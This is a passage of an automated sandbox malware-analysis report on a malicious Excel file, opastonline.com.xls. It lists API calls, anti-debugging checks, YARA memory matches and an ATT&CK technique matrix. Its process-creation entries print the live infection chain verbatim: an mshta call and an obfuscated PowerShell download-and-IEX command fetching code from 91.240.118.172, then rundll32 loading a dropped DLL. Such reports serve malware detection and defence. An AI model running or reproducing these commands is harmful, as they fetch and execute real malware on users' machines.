                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00767E00 FindFirstFileW,
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00224087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001F4087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00734087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00774087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 160.16.102.168 80
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",LdijUjelIhHUzGb
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",DllRegisterServer
                            Source: Yara matchFile source: opastonline.com.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\opastonline.com.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_1003DAA7 cpuid
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: 12.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.9c0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.31f0000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.3280000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2bd0000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.28f0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.29a0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2fb0000.24.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.24b0000.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.3030000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.870000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2ba0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.9f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.23f0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2d50000.18.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2bd0000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.29d0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.260000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3030000.26.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.31f0000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.870000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.24b0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.30d0000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2d50000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f70000.23.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3240000.29.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.260000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.2520000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2c60000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3030000.26.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2c90000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2fb0000.24.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2810000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2c90000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.760000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2e60000.21.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.730000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.30a0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.31c0000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.730000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2d20000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.29d0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.340000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.2b0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2e30000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.23a0000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.31d0000.28.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f70000.23.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2ad0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2aa0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.9c0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.8a0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.410000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f40000.22.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2de0000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f40000.22.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2de0000.19.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2ad0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2720000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3000000.25.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.720000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.2b0000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2810000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.2330000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.3030000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.410000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.31a0000.27.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.30d0000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000D.00000002.677067947.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.453101619.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.678344656.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677431003.0000000002BD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509305754.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677169719.0000000002810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677889401.0000000003001000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509452651.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.676890629.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677655437.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509112369.00000000023F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.508729235.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509093299.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.508905338.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.508777741.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.511827819.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.676823540.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.676935914.00000000009F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.676642352.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.512005602.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.678040246.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677708619.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.676672140.0000000000761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677290859.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677828983.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509149844.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509175911.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.678097225.0000000003241000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677992922.00000000031A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509224243.00000000028F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677771933.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.453319982.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677797866.0000000002F70000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677404297.0000000002BA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677466682.0000000002C61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677573347.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677263877.00000000029A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509407171.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677492210.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509387202.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.508826580.0000000000260000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677332473.0000000002AA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.508857582.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677359983.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.511919607.0000000000721000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509354773.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509069868.0000000002331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677545116.0000000002D21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509334125.00000000030A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677930195.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.508950592.0000000000410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.509428106.0000000003281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.676771447.0000000000870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677128024.0000000002721000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.453573074.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.677606163.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\JooSee.dll, type: DROPPED
                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts21
                            Scripting
                            Path Interception111
                            Process Injection
                            1
                            Disable or Modify Tools
                            1
                            Input Capture
                            2
                            System Time Discovery
                            Remote Services1
                            Archive Collected Data
                            Exfiltration Over Other Network Medium15
                            Ingress Tool Transfer
                            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Native API
                            Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                            Deobfuscate/Decode Files or Information
                            LSASS Memory3
                            File and Directory Discovery
                            Remote Desktop Protocol1
                            Email Collection
                            Exfiltration Over Bluetooth1
                            Encrypted Channel
                            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts13
                            Exploitation for Client Execution
                            Logon Script (Windows)Logon Script (Windows)21
                            Scripting
                            Security Account Manager38
                            System Information Discovery
                            SMB/Windows Admin Shares1
                            Input Capture
                            Automated Exfiltration3
                            Non-Application Layer Protocol
                            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts11
                            Command and Scripting Interpreter
                            Logon Script (Mac)Logon Script (Mac)2
                            Obfuscated Files or Information
                            NTDS1
                            Query Registry
                            Distributed Component Object Model1
                            Clipboard Data
                            Scheduled Transfer123
                            Application Layer Protocol
                            SIM Card SwapCarrier Billing Fraud
                            Cloud Accounts1
                            PowerShell
                            Network Logon ScriptNetwork Logon Script2
                            Masquerading
                            LSA Secrets21
                            Security Software Discovery
                            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
